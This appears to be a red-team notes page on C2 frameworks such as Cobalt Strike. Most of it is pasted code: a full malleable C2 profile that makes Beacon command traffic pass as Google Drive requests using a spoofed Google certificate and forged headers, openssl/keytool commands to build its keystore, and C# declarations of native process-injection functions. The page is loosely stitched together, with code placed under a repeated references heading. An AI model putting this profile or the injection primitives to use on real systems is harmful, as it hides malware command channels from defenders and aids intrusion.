Why it matters in practice
C2 Frameworks matters because it shapes how an operator scopes the work, chooses validation steps, prioritizes evidence and explains risk. The point is not to accumulate trivia; it is to understand which control boundary is in play and how that boundary can fail under realistic pressure.
This note keeps c2 frameworks tied to offensive workflow: what to observe, what to prove, what usually goes wrong, and which references remain useful once an assessment moves from planning into active validation.
Primary coverage
The items below mark the main workflows, concepts, tools and validation themes that repeatedly matter when working through c2 frameworks.
- C2 frameworks
- Poshc2
- Havoc c2 framework
- Brute ratel
- Cobalt strike
- Start the Cobalt Strike team server without a custom C2 profile
- Start the Cobalt Strike client
- On teamserver connect
- Cobalt strike dashboard
- Listener create
Selected public references
#
# Google Drive
#
# Author: @bluscreenofjeff
#
#set https cert info
https-certificate {
set CN "*.google.com"; #Common Name
set O "Google Inc"; #Organization Name
set C "US"; #Country
set L "Mountain View"; #Locality
set ST "California"; #State or Province
set validity "365"; #Number of days the cert is valid for
}
#default Beacon sleep duration and jitter
set sleeptime "60000";
set jitter "20";
#default useragent for HTTP comms
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
#IP address used to indicate no tasks are available to DNS Beacon
set dns_idle "8.8.4.4";
#Force a sleep prior to each individual DNS request. (in milliseconds)
set dns_sleep "0";
#Maximum length of hostname when uploading data over DNS (0-255)
set maxdns "235";
http-get {
set uri "/viewerng/meta";
client {
header "Accept" "text/html,application/xml;*/*;";
header "Accept-Encoding" "gzip, deflate";
header "Host" "drive.google.com";
header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";
#session metadata
metadata {
base64url;
netbios;
base64url;
parameter "id";
}
parameter "u" "0";
}
server {
header "Content-Type" "application/json; charset=utf-8";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "Pragma" "no-cache";
header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";
header "Connection" "close";
#Beacon's tasks
output {
print;
}
}
}
http-post {
set uri "/viewersng/meta";
set verb "GET";
client {
header "Accept" "text/html,application/xml;*/*;";
header "Accept-Encoding" "gzip, deflate";
header "Host" "drive.google.com";
header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";
output {
base64url;
netbios;
base64url;
parameter "id";
}
#session ID
id {
parameter "u";
}
}
server {
header "Content-Type" "application/json; charset=utf-8";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "Pragma" "no-cache";
header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";
header "Connection" "close";
output {
print;
}
}
}
#change the stager server
http-stager {
server {
header "Content-Type" "application/json; charset=utf-8";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "Pragma" "no-cache";
}
}openssl pkcs12 -inkey private.key -in public.crt -export -out c2_profile.pkcs12 keytool -importkeystore -srckeystore c2_profile.pkcs12 -srcstoretype pkcs12 -destkeystore c2_profile.store
using System;
using System.Runtime.InteropServices;
namespace NtMapViewOfSection
{
internal class Native
{
[DllImport("ntdll.dll")]
public static extern uint NtCreateSection(
ref IntPtr SectionHandle,
uint DesiredAccess,
IntPtr ObjectAttributes,
ref ulong MaximumSize,
uint SectionPageProtection,
uint AllocationAttributes,
IntPtr FileHandle);
[DllImport("ntdll.dll")]
public static extern uint NtMapViewOfSection(
IntPtr SectionHandle,
IntPtr ProcessHandle,
out IntPtr BaseAddress,
IntPtr ZeroBits,
IntPtr CommitSize,
IntPtr SectionOffset,
out ulong ViewSize,
uint InheritDisposition,
uint AllocationType,
uint Win32Protect);
[DllImport("ntdll.dll")]
public static extern uint NtCreateThreadEx(
out IntPtr threadHandle,
uint desiredAccess,
IntPtr objectAttributes,
IntPtr processHandle,
IntPtr startAddress,
IntPtr parameter,
bool createSuspended,
int stackZeroBits,
int sizeOfStack,
int maximumStackSize,
IntPtr attributeList);
}
}Selected public references
- Nmap Reference Guidenmap.org/book/man.html
- BloodHound Documentationbloodhound.specterops.io/
- GitHub ยท fortra / Impacketgithub.com/fortra/impacket
- MITRE ATT&CKattack.mitre.org/